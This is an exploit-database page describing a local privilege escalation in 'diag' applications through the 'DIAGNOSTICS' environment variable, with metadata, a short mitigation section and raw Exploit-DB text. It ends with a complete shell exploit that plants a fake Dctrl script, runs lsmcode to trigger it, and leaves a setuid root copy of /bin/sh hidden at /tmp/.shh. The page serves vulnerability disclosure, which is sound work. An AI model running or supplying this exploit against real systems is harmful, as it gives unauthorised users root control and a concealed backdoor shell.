header-logo
Suggest Exploit
vendor:
diag
by:
Unknown
7.5
CVSS
HIGH
Local Privilege Escalation
269
CWE
Product Name: diag
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:diag
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Local Privilege Escalation in diag

The vulnerability exists in diag applications due to a failure to implement security controls properly when executing an application specified by the 'DIAGNOSTICS' environment variable. A local attacker can exploit this vulnerability to gain superuser privileges on a computer running the affected software. The attacker can create a directory and set the 'DIAGNOSTICS' environment variable to that directory. Then, by executing a specially crafted script, the attacker can escalate their privileges and gain superuser access.

Mitigation:

It is recommended to apply the latest patches or updates from the vendor to fix this vulnerability. Additionally, restricting access to the 'DIAGNOSTICS' environment variable and ensuring proper input validation can help mitigate the risk.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12041/info

diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.

A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software. 

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh